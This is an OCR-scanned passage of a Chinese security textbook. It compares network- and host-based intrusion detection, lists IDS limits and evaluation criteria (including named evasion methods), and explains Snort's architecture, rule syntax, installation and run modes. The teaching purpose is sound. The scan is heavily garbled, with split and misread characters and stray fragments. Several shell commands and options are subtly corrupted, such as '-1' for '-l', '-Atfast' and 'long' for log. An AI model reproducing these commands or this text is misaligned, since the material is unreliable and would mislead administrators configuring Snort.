识 模块 通常 使 用 4 种 常用 技术 来 识别 攻击 标志 : 模式 、 表 达 式 或 字 节 匹配 ， 频 率 或 穿越 阀 
值 ， 低 级 事件 的 相关 性 ， 统 计 学 意义 上 的 非常 规 现象 检测 。 

一 旦 检测 到 了 攻击 行为 ，IDS 的 响应 模块 就 提供 多 种 选项 以 通知 、 报 警 并 对 攻击 采取 
相应 的 反应 。 反 应 因 系统 而 异 ， 但 通常 都 包括 通知 管理 员 、 中 断 连接 并 且 为 法 庭 分 析 和 证 
据 收集 而 做 的 会 话 记 录 。 

基于 网 络 的 IDS 已 经 广泛 成 为 安全 策略 的 实施 中 的 重要 组 件 ， 它 有 许多 仅 靠 基 于 主机 
的 入 侵 检测 法 无 法 提供 的 优点 。 

(1) 拥有 成 本 较 低 。 基 于 网 络 的 IDS 可 在 儿 个 关键 访问 点 上 进行 策略 配置 ， 以 观察 发 
往 多 个 系统 的 网 络 通信 。 所 以 它 不 要 求 在 许多 主机 上 装载 并 管理 软件 。 由 于 需 监测 的 点 较 
少 ， 因 此 对 于 一 个 公司 的 环境 来 说 ， 成 本 很 低 。 

(2) 检测 基于 主机 的 系统 漏 掉 的 攻击 。 基 于 网 络 的 IDS 检查 所 有 包 的 头 部 从 而 发 现 亚 
意 的 和 可 疑 的 行动 迹象 。 基 于 主机 的 IDS 无 法 查看 包 的 头 部 ， 所 以 它 无 法 检测 到 这 一 类 型 
的 攻击 。 例 如， 许多 来 自 于 下 地址 的 拒绝 服务 型 和 碎片 型 攻击 只 能 在 它们 经 过 网 络 时 ,在 
基于 网 络 的 IDS 中 通过 实时 监测 包 流 而 被 发 现 。 

基于 网 络 的 IDS 可 以 检查 有 效 负载 的 内 容 ， 查 找 用 于 特定 攻击 的 指令 或 语法 。 例 如 ， 
通过 检查 数据 包 有 效 负载 可 以 查 到 黑客 软件 ， 而 使 正在 寻找 系统 漏洞 的 攻击 者 毫 无 察觉 。 
由 于 基于 主机 的 系统 不 检查 有 效 负载 ， 所 以 不 能 辨认 有 效 负载 中 所 包含 的 攻击 信息 。 

(3) 攻击 者 不 易 转 移 证 据 。 基 于 网 络 的 IDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 
检测 ， 所 以 攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ， 而 且 还 包括 可 识别 
的 入 侵 者 身份 及 对 其 进行 起 诉 的 信息 。 许 多 入 侵 者 都 熟知 审 记 记录 ， 他 们 知道 如 何 操纵 这 
些 文件 掩盖 他 们 的 入 侵 痕 迹 ， 来 阻止 需要 这 些 信息 的 基于 主机 的 IDS 去 检测 入 侵 。 

(4) 实时 检测 和 响应 。 基 于 网 络 的 IDS 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 
出 来 ， 并 做 出 更 快 的 通知 和 响应 。 例 如 ， 一 个 基于 TCP 的 对 网 络 进行 的 拒绝 服务 攻击 可 以 
通过 将 基于 网 络 的 IDS 发 出 TCP 复位 信号 , 在 该 攻击 对 目标 主机 造成 破坏 前 将 其 中 断 。 而 
基于 主机 的 系统 只 有 在 可 疑 的 登录 信息 被 记录 下 来 以 后 才能 识别 攻击 并 做 出 反应 。 而 这 时 
关键 系统 可 能 早 就 遭 到 了 破坏 , 或 是 运行 基于 主机 的 IDS 的 系统 已 被 摧毁 。 实 时 IDS 可 根 
据 预定 义 的 参数 做 出 快速 反应 ， 这 些 反应 包括 将 攻击 设 为 监视 模式 以 收集 信息 ， 立 即 中 止 
攻击 等 。 

(5) 检测 未 成 功 的 攻击 和 不 良 意图 。 基 于 网 络 的 IDS 增加 了 许多 有 价值 的 数据 ， 以 判 
别 不 良 意图 。 即 便 防火 墙 可 能 正在 拒绝 这 些 尝试 ， 位 于 防火 墙 之 外 的 基于 网 络 的 IDS 可 以 
查 出 躲 在 防火 墙 后 的 攻击 意图 。 基 于 主机 的 系统 无 法 查 到 从 未 攻击 到 防火 墙 内 主机 的 未 遂 
攻击 ， 而 这 些 丢失 的 信息 对 于 评估 和 优化 安全 策略 是 至 关 重要 的 。 

(6) 操作 系统 无 关 性 。 基 于 网 络 的 IDS 作为 安全 监测 资源 ， 与 主机 的 操作 系统 无 关 。 
与 之 相 比 ， 基 于 主机 的 系统 必须 在 特定 的 、 没 有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 ， 生 


成 有 用 的 结果 。 
网 络 入 侵 检测 系统 有 向 专门 的 设备 发 展 的 趋势 ， 安 装 这 样 的 一 个 网 络 入 侵 检测 系统 非 ” 匡 
常 方 便 ， 只 需 将 定制 的 设备 接 上 电源 ， 做 很 少 的 一 些 配置 ， 将 其 连 到 网 络 上 即 可 。 第 
网 络 入 侵 检测 系统 有 如 下 的 弱点 。 11 
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(1) 网 络 入 侵 检测 系统 只 检查 它 直 接连 接 网 段 的 通信 ， 不 能 检测 在 不 同 网 段 的 网 络 
包 。 在 使 用 交换 以 太 网 的 环境 中 就 会 出 现 监 测 范围 的 局 限 。 而 安装 多 台 网 络 入 侵 检测 系统 
的 传感器 会 使 部 署 整个 系统 的 成 本 大 大 增加 。 

(2) 网 络 入 侵 检测 系统 为 了 性 能 目标 通常 采用 特征 检测 的 方法 ， 它 可 以 检测 出 普通 的 
一 些 攻 击 ， 而 很 难 实现 一 些 复杂 的 需要 大 量 计 算 与 分 析 时 间 的 攻击 检测 。 

(3) 网 络 入 侵 检测 系统 可 能 会 将 大 量 的 数据 传 回 分 析 系统 中 。 在 一 些 系统 中 监听 特定 
的 数据 包 会 产生 大 量 的 分 析 数据 流量 。 一 些 系统 在 实现 时 采用 一 定 方法 来 减少 回 传 的 数据 
量 ， 对 入 侵 判断 的 决策 由 传感器 实现 ， 而 中 央 控 制 台 成 为 状态 显示 与 通信 中 心 ， 不 再 作为 
入 侵 行 为 分 析 器 。 这 样 的 系统 中 的 传感器 协同 工作 能 力 较 弱 。 

(4) 网 络 入 侵 检测 系统 处 理 加密 的 会 话 过 程 较 困难 ， 目 前 通过 加 密 通道 的 攻击 尚 不 
多 ， 但 随 着 IPv6 的 普及 ， 这 个 问题 会 越 来 越 突出 。 

基于 主机 和 基于 网 络 的 入 侵 检测 都 有 其 优势 和 劣势 ， 两 种 方法 互 为 补充 。 一 种 真正 有 
效 的 入 侵 检测 系统 应 将 二 者 结合 。 


11.3.4 入 侵 检 测 系统 的 优点 与 局 限 性 


入 侵 检 测 系统 是 企业 安全 防御 系统 中 的 重要 部 件 ， 但 入 侵 检 测 系统 并 不 是 万 能 的 。 入 
侵 检 测 对 于 部 分 事件 可 以 处 理 得 很 好 ， 但 对 于 另 一 些 情况 则 无 能 为 力 。 只 有 充分 了 解 入 侵 
检测 系统 的 优点 和 局 限 性 ， 才 能 对 入 侵 检测 系统 有 一 个 准确 的 定位 ， 以 便 将 入 侵 检测 系统 
有 效 地 应 用 在 安全 防御 系统 中 ， 最 大 限度 地 发 挥 它 的 安全 防御 功能 。 

1， 人 入 侵 检 测 系统 的 优点 

入 侵 检 测 系统 作为 一 个 迅速 凯 起 并 受到 广泛 承认 的 安全 组 件 ， 有 着 很 多 方面 的 安全 
优势 。 

(1) 可 以 检测 和 分 析 系统 事件 以 及 用 户 的 行为 

(2) 可 以 检测 系统 设置 的 安全 状态 ; 

(3) 以 系统 的 安全 状态 为 基础 ， 跟 踪 任 何 对 系统 安全 的 修改 操作 

(4) 通过 模式 识别 等 技术 从 通信 行为 中 检测 出 已 知 的 攻击 行为 ; 

(5) 可 以 对 网 络 通信 行为 进行 统计 ， 并 进行 检测 分 析 ; 

(6) 管理 操作 系统 认证 和 日 志 机 制 并 对 产生 的 数据 进行 分 析 处 理 ; 

(7) 在 检测 到 攻击 的 时 候 ， 通 过 适当 的 方式 进行 适当 的 报警 处 理 ; 

(8) 通过 对 分 析 引 擎 的 配置 对 网 络 的 安全 进行 评估 和 监督 

(9) 允许 非 安全 领域 的 管理 人 员 对 重要 的 安全 事件 进行 有 效 的 处 理 。 

2. 入侵 检测 系统 的 局 限 性 

入 侵 检测 系统 只 能 对 网 络 行为 进行 安全 审计 ， 从 入 侵 检测 系统 的 定位 可 以 看 出 ， 入 侵 
检测 系统 存在 以 下 缺陷 。 

(1) 入 侵 检测 系统 无 法 弥补 安全 防御 系统 中 的 安全 缺陷 和 漏洞 。 这 些 安全 缺陷 和 漏洞 
包括 其 他 安全 设备 的 错误 配置 造成 的 安全 漏洞 , 以 及 安全 设备 本 身 的 实现 造成 的 安全 缺陷 。 
入 侵 检测 系统 可 以 通过 审计 报警 对 这 些 可 能 的 安全 漏洞 进行 揭示 和 定位 ， 但 却 不 能 主动 对 
这 些 漏洞 进行 弥补 ， 而 这 些 报警 信息 只 有 通过 人 为 的 补救 处 理 才 具有 意义 。 

(2) 对 于 高 负载 的 网 络 或 主机 ， 很 难 实现 对 网 络 入 侵 的 实时 检测 、 报 警 和 迅速 地 进行 


攻击 响应 。 同 时 ， 对 于 高 负载 的 环境 ， 如 果 没有 采用 代价 较 大 的 负载 均衡 措施 ， 入 侵 检测 
系统 会 存在 较 大 的 分 析 遗 漏 ， 容 易 造 成 较 大 的 漏 报警 率 。 

(3) 基于 知识 的 入 侵 检测 系统 很 难 检测 到 未 知 的 攻击 行为 ， 也 就 是 说 ， 检 测 具 有 一 定 
的 后 请 性 ， 而 对 于 已 知 的 报警 ， 一 些 没 有 明显 特征 的 攻击 行为 也 很 难 检测 到 ， 或 需要 付出 
提高 误 报警 率 的 代价 才能 够 正确 检测 。 而 基于 行为 特征 的 入 侵 检测 系统 只 能 在 一 定 程度 上 
检测 到 新 的 攻击 行为 ， 但 一 般 很 难 给 新 的 攻击 定性 ， 提 供给 系统 管理 员 的 处 理 信息 较 少 ， 
很 难 进行 进一步 的 防护 处 理 。 

(4) 入 侵 检测 系统 的 主动 防御 功能 和 联动 防御 功能 会 对 网 络 的 行为 产生 影响 ， 同 样 也 
会 成 为 攻击 者 的 目标 ， 实 现 以 入 侵 检测 系统 过 敏 自 动 防御 为 基础 的 攻击 。 通 过 发 送 伪造 的 
数据 ， 触 发 入 侵 检测 系统 的 主动 防御 响应 ， 对 可 信和 连接 进行 阻 断 ， 造 成 拒绝 服务 攻击 。 在 
目前 的 技术 条 件 下 ， 对 于 网 络 的 主动 防御 的 设置 要 十 分 慎重 ， 防 止 出 现 利用 主动 防御 系统 
进行 网 络 攻击 的 情况 。 

(5) 入 侵 检测 系统 无 法 单独 防止 攻击 行为 的 渗透 ， 只 能 调整 相关 网 络 设备 的 参数 或 人 
为 地 进行 处 理 。 由 于 入 侵 检测 技术 不 可 避免 地 存在 着 大 量 的 误 报 情况 ， 因 此 进行 自动 防御 
会 造成 对 可 信和 连接 的 影响 。 目 前 的 入 侵 检测 系统 在 实质 性 安全 防御 方面 ， 还 是 要 以 人 为 修 
正 为 主 ， 即 使 是 对 可 确定 入 侵 的 自动 阻 断 行为 ， 建 议 也 要 经 过 人 为 干预 ， 防 止 可 能 的 过 敏 
防御 。 

(6) 网 络 入 侵 检 测 系 统 在 纯 交 换 环境 下 无 法 正常 工作 ， 只 有 对 交换 环境 进行 一 定 的 处 
理 ， 利 用 镜像 等 技术 ， 网 络 入 侵 检测 系统 才能 对 镜像 的 数据 进行 分 析 处 理 。 因 此 ， 在 交换 
环境 中 ， 进 行 各 个 方向 的 检测 分 析 将 非常 困难 并 且 代 价 较 大 。 

(7) 入 侵 检测 系统 主要 是 对 网 络 行为 进行 分 析 检测 ， 不 能 修正 信息 资源 中 存在 的 安全 
问题 。 

11.3.5 ”入侵 检测 系统 的 评估 


目前 市 场 上 有 许多 入 侵 检 测 系统 ， 这 些 产 品 在 不 同方 面 都 有 各 自 的 特色 。 如 何 去 评 价 
这 些 产品 , 尚 无 形成 规定 的 评估 标准 。 一 般 可 以 从 以 下 几 个 方面 去 评价 一 个 入 侵 检测 系统 。 

(1) 能 否 保证 自身 的 安全 。 和 其 他 系统 一 样 ， 入 侵 检测 系统 本 身 也 往往 存在 安全 漏洞 。 
若 对 入 侵 检测 系统 攻击 成 功 ， 则 直接 导致 其 报警 失灵 ， 入 侵 者 在 其 后 所 做 的 行为 将 无 法 被 
记录 。 因 此 入 侵 检 测 系统 首先 必须 保证 自己 的 安全 性 。 

(2) 网 络 入 侵 检测 系统 负载 能 力 以 及 可 支持 的 网 络 类 型 。 根 据 网 络 入 侵 检测 系统 所 部 
署 的 网 络 环境 不 同 要 求 也 不 同 。 对 于 网 络 入侵 检 测 系统 ， 最 大 可 处 理 流量 〈 包 / 秒 ，pps) 
是 多 少 。 首 先 ， 要 分 析 网 络 入 侵 检测 系统 所 部 署 的 网 络 环境 ， 如 果 在 512KB 或 2MB 专线 
上 部 署 网 络 入 侵 检测 系统 ， 则 不 需要 高 速 的 入 侵 检测 引擎 ， 而 在 负荷 较 高 的 环境 中 ， 人 性 能 
是 一 个 非常 重要 的 指标 。 较 少 的 资源 消耗 ， 不 影响 受 保护 主机 或 网 络 的 正常 运行 。 

(3) 升级 与 维护 系统 的 开销 。 像 反 病 毒 软件 一 样 ， 入 侵 检测 的 特征 库 需要 不 断 更 新 才 
能 检测 出 新 出 现 的 攻击 方法 。 

(4) 运行 的 开销 : 产品 报表 结构 、 处 理 误 报 的 方便 程度 、 事 件 与 日 志 查 询 的 方便 程度 
以 及 使 用 该 系统 所 需 的 技术 人 员 数 量 。 

(5) 入 侵 检测 系统 报警 准确 率 。 误 报 和 漏 报 的 情况 尽量 少 。 


信 驼 稚 击 
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(6) 支持 的 入 侵 特征 数 。 协 议 分 析 及 检测 能 力 。 

(7) 是 否 支持 卫 碎片 重组 。 入 侵 检测 中 ， 分 析 单 个 的 数据 包 会 导致 许多 误 报 和 漏 报 ， 
人 P 碎 片 的 重组 可 以 提高 检测 的 精确 度 。 而 且 ，IP 碎片 是 网 络 攻击 中 常用 的 方法 ， 因 此 ， 人 P 
碎片 的 重组 还 可 以 检测 利用 卫 碎片 的 攻击 。 卫 碎片 重组 的 评测 标准 有 三 个 性 能 参数 ， 能 
重组 的 最 大 IP 分 片 数 、 能 同时 重组 的 瑟 包 数 、 能 进行 重组 的 最 大 卫 数据 包 的 长 度 。 

(8) 是 否 支 持 TCP 流 重 组 。TCP 流 重 组 是 为 了 对 完整 的 网 络 对 话 进行 分 析 ， 它 是 网 络 
入 侵 检测 系统 对 应 用 层 进 行 分 析 的 基础 。 如 检查 邮件 内 容 、 附 件 ， 检 查 FTP 传输 的 数据 ， 
禁止 访问 有 害 网 站 、 判 断 非 法 HITP 请 求 等 。 

(9) 系统 的 价格 : 当然 ， 价 格 是 必须 考虑 的 要 点 ， 不 过 ， 性 能 价格 比 以 及 要 保护 系统 
的 价值 是 更 重要 的 因素 。 

(10) 该 产品 是 否 容易 被 躲避 。 有 些 常用 的 躲 开 入 侵 检测 的 方法 ， 如 分 片 、TTL 欺骗、 
异常 TCP 分 段 、 慢 扫描 、 协 同 攻击 等 。 

(11) 产品 的 可 伸缩 性 。 系 统 支持 的 传感器 数目 、 最 大 数据 库 大 小 、 传 感 器 与 控制 台 之 
间 通 信人 带宽 和 对 审计 日 志 溢出 的 处 理 。 

(12) 产品 有 哪些 响应 方法 。 要 从 本 地 、 远 程 等 多 个 角度 考察 。 如 自动 配置 防火 墙 是 
一 个 极为 危险 的 举动 。 

(13) 是 否 通 过 了 国家 权威 机 构 的 评测 。 主 要 的 权威 测评 机 构 有 国家 信息 安全 测评 认 
证 中 心 、 公 安 部 计算 机 信息 系统 安全 产品 质量 监督 检验 中 心 。 


11.4 入侵 检测 系统 示例 


为 了 直观 地 理解 入 侵 检测 的 使 用 、 配 置 等 情况 ,下面 以 Snort 为 例 对 构建 以 Snort 为 基 
础 的 入 侵 检测 系统 进行 介绍 。 


11.4.1 Snort 简介 


Snort 是 开源 、 高 度 可 配置 且 可 移植 的 基于 主机 或 基于 网 络 的 IDS。Snort 被 称 为 是 轻 
量 级 IDS， 它 具有 以 下 特征 : 

(1) 可 以 在 大 多 数 网 络 节点 〈 主 机 、 服 务 器 和 路 由 器 ) 轻松 地 部 署 。 

(2) 使 用 少量 的 内 存 和 处 理 器 时 间 进行 高 效 操作 。 

(3) 系统 管理 员 可 以 容易 地 进行 配置 ， 以 便 在 较 短 时 间 内 实现 特定 的 安全 解决 方案 。 

Snort 可 以 进行 实时 数据 包 的 捕获 、 协议 分 析 以 及 内 容 搜 索 与 匹配 。 根据 一 组 由 系统 管 
理 员 配置 的 规则 ，Snort 能 够 检测 到 很 多 种 攻击 和 探测 。 


11.4.2 Snort 体系 结构 


一 个 Snort 包括 以 下 4 个 逻辑 组 件 ， 如 图 11-8 所 示 。 

(1) 数据 包 和 解码 器 (packet decoder): 数据 包 解 码 器 处 理 每 个 捕获 的 数据 包 ， 在 数据 
链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 识 别 和 隔离 协议 首部 。 解 码 器 被 设计 为 尽 可 能 高 效 ， 它 
的 主要 工作 包括 设置 指针 ， 以 便 可 以 很 容易 地 提取 各 种 协议 首部 。 

(2) 检测 引擎 (detection engine): 检测 引擎 完成 入 侵 检测 的 实际 工作 。 本 模块 基于 一 


组 由 安全 管理 员 配 置 的 Snort 规则 来 分 析 每 个 数据 。 从 本 质 上 讲 ， 每 个 数据 包 依 据 所 有 规 
则 进行 检查 ， 以 确定 该 数据 包 是 否 与 根据 规则 定义 的 特征 相 匹配 ， 与 已 解码 的 数据 包 匹配 
的 第 一 个 规则 触发 规则 指定 的 动作 ， 如 果 没 有 规则 匹配 该 数据 包 ， 则 检测 引擎 放弃 此 数 
据 包 。 

(3) 记录 器 〈logger): 对 于 每 个 与 规则 匹配 的 数据 包 ， 该 规则 指定 什么 日 志和 报警 选 
项 是 要 执行 的 。 当 选 定 一 个 记录 器 选项 时 ， 记 录 器 存储 检测 到 的 数据 包 以 可 读 格 式 或 更 加 
紧凑 的 二 进 制 格式 存储 在 指定 的 日 志文 件 中 ， 然 后 ， 安 全 管理 员 可 以 使 用 日 志文 件 进行 以 
后 的 分 析 。 

(4) 报警 器 (alerter): 对 于 每 个 检测 到 的 数据 包 ， 发 送 一 个 报警 。 匹 配 规则 中 的 报警 
选项 确定 事件 通知 中 包括 哪些 信息 。 事 件 通知 可 以 发 送 到 文件 _UNIX 套 接 字 或 者 数据 库 。 
报警 也 可 以 在 测试 或 渗透 研究 期 间 关闭 ， 使 用 UNIX 套 接 字 ， 可 以 将 通知 发 送 到 网 络 上 其 
他 地 方 的 管理 机 。 


数据 包 


图 11-8 Snort 体系 结构 


11.4.3 Snort 规则 


Snort 使 用 一 种 简单 、 灵 活 的 规则 来 定义 生成 检测 引擎 使 用 的 规则 的 语言 。 尽管 规则 非 
常 简单 ， 可 以 直接 编写 , 但 它们 的 功能 可 以 检测 各 种 恶意 或 可 疑 的 网 络 流量 。Snort 规则 格 
式 如 图 11-9 所 示 。 


动作 协议 源 耳 地 址 | 源 端口 | 方向 | eaar | 目的 端口 


选项 关键 字 | 选项 参数 


图 11-9 Snort 规则 格式 


每 个 规则 包括 一 个 固定 的 首部 和 零 个 或 多 个 选项 ， 首 部 包含 以 下 元 素 。 

(1) 动作 (action): 规则 动作 告诉 Snort 当 它 找到 符合 规则 条 件 的 数据 包 时 应 如 何 去 
做 。 表 11-1 列 出 了 可 用 的 动作 。 列 表 中 的 最 后 三 个 动作 只 在 内 嵌 模 式 下 可 用 。 

(2) 协议 (procotol): Snort 继续 分 析 数 据 包 协议 是 否 匹 配 这 个 字段 。Snort 的 当前 版 
本 支持 4 个 协议 ， 包 括 TCP、UDP、ICMP 和 也 。Snort 的 未 来 版 本 将 支持 更 多 的 协议 。 

(3) 源 下 地 址 (source IP address): 指明 数据 包 的 源 。 该 规则 可 以 指定 特定 的 下 地 


入 和 您 擒 测 
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址 、 任 何 人 P 地 址 和 特定 的 人 P 地 址 列表 ， 或 者 拒绝 特定 的 人 P 地 址 或 IP 地 址 列表 。 拒 绝 表 
示 在 列表 之 外 的 任何 卫 地 址 都 是 匹配 的 。 

(4) 源 端口 (source port): 该 字段 指出 用 于 指定 协议 的 源 端口 (如 TCP 端口 )， 可 以 
以 多 种 方式 指定 端口 号 ， 包 括 特定 端口 号 、 任 何 端口 、 静 态 端 口 定义 、 端 口 范 围 和 拒绝 某 
些 端口 。 

(5) 方向 (direction): 该 字段 采用 单 向 或 双向 ， 双 向 选项 告诉 Snort 应 该 将 规则 中 的 
地 址 /端口 对 理解 为 前 面 是 源 后 面 是 目的 ， 或 者 前 面 是 目的 后 面 是 源 。 利 用 双向 选项 ，Snort 
能 够 监控 对 话 的 双方 。 

(6) 日 的 他 地 址 (destination IP address): 指明 数据 包 的 目的 地 。 

(7) 目的 端口 (destination port): 指明 目的 端口 。 


表 11-1 Snort 规则 动作 

动作 说 明 
alert 使 用 所 选 的 报警 方式 生成 报警 ， 再 将 数据 包 写 入 日 志 
long 将 数据 包 写 入 日 志 
pass 忽略 数据 包 
activate ”报警 后 再 激活 另 一 个 dynamic 规则 
dynamic ”保持 空闲 直到 被 activate 规则 激活 ， 然 后 作为 log 规则 
drop 使 iptables 丢弃 数据 包 并 写 入 日 志 
reject 使 iptables 丢弃 数据 包 ， 记 入 日 志 ， 并 发 送 数据 ， 如 果 协 议 是 TCP， 则 发 送 TCP 重 置 ， 如果 

协议 是 UDP， 则 发 送 ICMP 端口 不 可 达 消 息 
sdrop 使 iptables 丢弃 数据 包 但 不 写 入 日 志 


在 规则 首部 之 后 可 以 有 一 个 或 多 个 规则 选项 。 每 个 选项 由 选项 关键 字 组 成 ， 关 键 字 定 
义 选项 ， 后 面 跟着 参数 ， 指 定 选项 的 详细 信息 。 在 书面 形式 中 ， 规 则 选项 集 被 括 在 括号 中 
与 首部 分 开 。Snort 规则 选项 用 分 号 分 隔 ， 规 则 选项 关键 字 与 其 参数 用 冒号 分 隔 。 

有 以 下 4 个 主要 类 别 的 规则 选项 。 

(1) 元 数据 (meta-data): 提供 关于 规则 的 信息 ， 但 在 检测 期 间 不 起 任何 作用 。 

(2) 有 效 载荷 (payload): 查找 有 效 载荷 数据 包 中 的 数据 ， 可 以 是 相关 的 。 

(3) 非 有 效 载 荷 (non-payload): 查找 非 有 效 载荷 数据 。 

(4) 后 检测 (post-detection): 当 规则 匹配 一 个 数据 包 后 引发 的 特定 规则 。 


11.4.4 Snort 的 安装 与 使 用 


1. Snort 的 安装 模式 

Snort 可 安装 为 守护 进程 模式 ， 也 可 安装 为 包括 很 多 其 他 工具 的 完整 的 入 侵 检 测 系统 。 
简单 方式 安装 Snort 时 ， 可 以 得 到 入 侵 数据 的 文本 文件 或 二 进 制 文件 ， 然 后 用 文本 编辑 器 
等 工具 进行 查看 。 这 种 安装 模式 下 ，Snort 可 将 告警 信息 以 SNMP trap 的 形式 发 送 到 类 似 于 
HP OpenView 或 OpenNMS 之 类 的 网 管 系统 上 ， 也 可 以 SNMP 弹出 窗口 的 形式 发 送 到 运行 
Windows 操作 系统 的 计算 机 上 。 

Snort 若 与 其 他 工具 一 起 安装 ， 则 可 以 支持 更 为 复杂 的 操作 。 例 如 ， 将 Snort 数据 发 送 
给 数据 库 系统 ， 从 而 支持 通过 Web 界面 进行 数据 分 析 ， 以 增强 对 Snort 捕获 数据 的 直观 认 


识 ， 避 免 耗 费 大 量 时 间 查 阅 星 涩 的 日 志文 件 。 

2. Snort 的 简单 安装 

Snort 的 安装 程序 包括 Linux 平 台 程 序 和 Windows 平 台 程 序 , 所 有 安装 程序 可 以 在 Snort 
官方 网 站 (http://www.snort.org) 上 获取 。Linux 平台 下 通常 使 用 源 代码 包 的 形式 进行 安装 ， 
可 以 方便 进行 参数 配置 ， 下 面 介绍 Linux 平台 下 Snort 源 代码 包 的 简单 安装 方法 。 

1) 安装 Snort 

Snort 的 正常 运行 必须 要 有 libpcap 库 的 支持 ， 因 此 在 安装 Snort 之 前 需要 确认 系统 已 
经 安装 了 libpcap 库 ， 若 未 安装 ， 可 以 到 http://www.tcpdump.org 网 站 下 载 。 


[root@ mail snort-2.8.0]# ./configure - - enable-dynamicplugin 
[root@ mail snort-2.8.0]# make 
[root@ mail snort-2.8.0]# make install 


其 中 ，- - enable-dynamicplugin 是 为 了 产生 /usr/local/lib/snort_dynamicpreprocessor/ 这 个 
目录 ， 否 则 启动 Snort 为 Network Intrusion Detection System Mode 模式 时 会 出 现 如 下 错误 : 


FATAL ERROR: /etc/snort/snort.conf (183) = > Unknown rule type 


dynamicpreprocessor 


更 多 安装 选项 请 参阅 doc/INSTALL 文件 。 
2) 更 新 Snort 规则 
下 载 最 新 的 规则 文件 snortrules-snapshot-CURRENT.tar.gz。 其 中 ，CURRENT 表示 最 新 


的 版 本 号 。 


[root@ mail snort]# mkdir /etc/snort 
[root@ mail snort]# cd /etc/snort 
[root@ mail snort]# tar zxvf /path/to/snortrules-snapshot-CURRENT.tar.gz 


3) 配置 Snort 
建立 config 文件 目录 : 


[root@ mail snort-2.8.0]# mkdir/etc/snort 

复制 Snort 配置 文件 snort.conf 到 Snort 配置 目录 : 

[root@ mail snort-2.8.0]# cp./etc/snort.conf/etc/snort/ 
编辑 snort.conf: 


[root@ mail snort-2.8.0]# vi/etc/snort/snort.conf 


修改 后 ， 一 些 关键 设置 如 下 : 


var HOME NET yournetwork 

var RULE PATH /etc/snort/rules 

preprocessor http inspect: global 

iis unicode map /etc/snort/rules/unicode.map 1252 


include /etc/snort/rules/reference.config 


入 任 检 六 


| 
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include /etc/snort/rules/classification.config 
4) 测试 Snort 


# /usr/local/bin/snort -A fast -b -d -D -1 /var/log/snort -c /etc/snort/ 


snort.conf 


查看 文件 warlog/messages， 若 没有 错误 信息 ， 则 表示 安装 成 功 。 
5) 日 志 写 入 MySQL 数据 库 
建立 数据 库 : 


当 echo "CREATE DATABASE snort;" | mysql -u root -p 

建立 表 〈 使 用 schemas/create mysql 文件 ): 

% mysql -D snort -u Foot -p < ./schemas/create mysql 

建立 用 户 及 权限 : 

mysql > set password for "snortusr '@'localhost' = password('mypassword') 
修改 snort.conf 文件 : 


output database: log,mysql,user=snortusr password=mypassword dbname=snort 

host= localhost 

3. Snort 的 工作 模式 

Snort 有 三 种 工作 模式 ， 即 嗅 探 器 、 数 据 包 记录 器 及 网 络 入 侵 检 测 系统 。 嗅 探 器 模式 仅 
从 网 络 上 读 取 数 据 包 并 不 断 地 显示 在 终端 上 ,数据 包 记录 器 模式 则 把 数据 包 记录 到 硬盘 上 ， 
网 络 入 侵 检测 模式 最 为 复杂 ， 而 且 可 配置 。 

1) 嗅 探 器 

所 谓 的 嗅 探 器 模式 就 是 Snort 从 网 络 上 获取 数据 包 然 后 显示 在 控制 台 上 。 若 只 把 
TCP/IP 包头 信息 打印 在 屏幕 上 ， 则 只 需要 执行 下 列 命令 : 


" /snort -=v 

若 显 示 应 用 层 数 据 ， 则 执行 : 

/snort =va 

若 同时 显示 数据 链 路 层 信息 ， 则 执行 : 
./snort -vde 


2) 数据 包 记录 器 
如 果 要 把 所 有 的 数据 包 记录 到 硬盘 上 , 则 需要 指定 一 个 日 志 目录 ，Snort 将 会 自动 记录 
数据 包 : 


./snort -dev -1 ./log 


当然 ，./log 目录 必须 存在 ,否则 Snort 就 会 报告 错误 信息 并 退出 。 当 Snort 在 这 种 模式 
下 运行 时 ， 它 会 记录 所 有 捕获 的 数据 包 ， 并 将 其 放 到 一 个 目录 中 ， 该 目录 以 数据 包 目 的 主 
机 的 卫 地 址 命名 ， 例 如 ，192.168.8.112。 

如 果 网 络 速度 很 快 ， 或 者 希望 日 志 更 加 紧凑 以 便 事后 分 析 ， 则 应 该 使 用 二 进 制 日 志文 
件 格式 。 使 用 下 面 的 命令 可 以 把 所 有 的 数据 包 记录 到 一 个 单一 的 二 进 制 文件 中 : 


./snort -1 ./log -b 


随后 可 以 使 用 任何 支持 ttpdump 二 进 制 格式 的 嗅 探 器 程序 从 该 文件 中 读 出 数据 包 ， 例 
如 tcpdump 或 者 Ethereal。 使 用 -r 功能 开关 ， 也 可 使 Snort 读 出 包 中 的 数据 。Snort 在 所 有 
运行 模式 下 都 能 够 处 理 tcpdump 格式 的 文件 。 

对 于 希望 在 嗅 探 器 模式 下 把 一 个 tcpdump 格式 的 二 进 制 文件 内 容 显示 到 屏幕 上 ， 可 以 
输入 下 面 的 命令 : 


./snort -dv -r packet.1og 


在 数据 包 和 入 侵 检 测 模 式 下 ， 通 过 BPF 接口 可 以 使 用 多 种 方式 维护 日 志文 件 中 的 数 
据 。 例 如 ， 希 望 从 日 志文 件 中 提取 ICMP 包 ， 只 需要 输入 下 面 的 命令 行 : 


./snort -dvr packet.1og icmp 


3) 网 络 入 侵 检测 系统 
通过 下 面 命令 行 ， 可 以 将 Snort 启动 为 网 络 入 侵 检测 系统 模式 : 


./snort -dev -1 ./log -h 192.168.8.0/24 -c snort.conf 


snort.conf 是 规则 集 文件 。Snort 会 将 每 个 包 和 规则 集 进 行 匹 配 ， 一 旦 匹配 成 功 就 会 采 
取 相应 措施 。 若 不 指定 输出 目录 ，Snort 就 将 日 志 输出 到 /varlog/snort 目录 。 

在 网 络 入 侵 检测 模式 下 ， 可 以 有 多 种 方式 配置 Snort 的 输出 。 默 认 情 况 下 ，Snort 以 
ASCII 格式 记录 日 志 ， 使 用 foll 报警 机 制 。 如 果 使 用 foll 报警 机 制 ，Snort 会 在 包头 之 后 打 
印 报警 消息 。 如 果 不 需 要 日 志 包 ， 可 以 使 用 -N 选项 进行 关闭 。 

Snort 有 6 种 报警 机 制 : fall、 人 fast、socket、syslog、smb 和 none。 其 中 下 列 4 个 机 制 可 
以 在 命令 状态 下 使 用 -A 选项 进行 设置 。 

(1) -Atfast， 报 警 信息 包括 时 间 戳 、 报 警 消息 、 源 /目的 卫 地 址 和 端口 。 

